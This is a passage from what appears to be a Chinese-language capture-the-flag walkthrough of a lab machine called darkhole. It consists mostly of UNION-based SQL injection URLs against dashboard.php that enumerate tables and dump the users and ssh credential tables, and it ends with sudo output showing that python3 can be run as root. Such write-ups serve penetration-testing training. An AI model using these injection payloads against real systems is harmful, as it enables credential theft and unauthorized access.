http://192.168.242.64/dashboard.php?id=0' union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() --+
对ssh感兴趣,所以先看users
1
http://192.168.242.64/dashboard.php?id=0' union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name='users' --+
爆数据
1
http://192.168.242.64/dashboard.php?id=0' union select 1,group_concat(username,':',password),3,4,5,6 from users --+
只出来一个用户,怪不得不能越权
再看ssh表
1
http://192.168.242.64/dashboard.php?id=0' union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name='ssh' --+
1
http://192.168.242.64/dashboard.php?id=0' union select 1,group_concat(id,':',user,':',pass),3,4,5,6 from ssh --+
MatchingDefaults entries for losy on darkhole: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User losy may run the following commands on darkhole: (root) /usr/bin/python3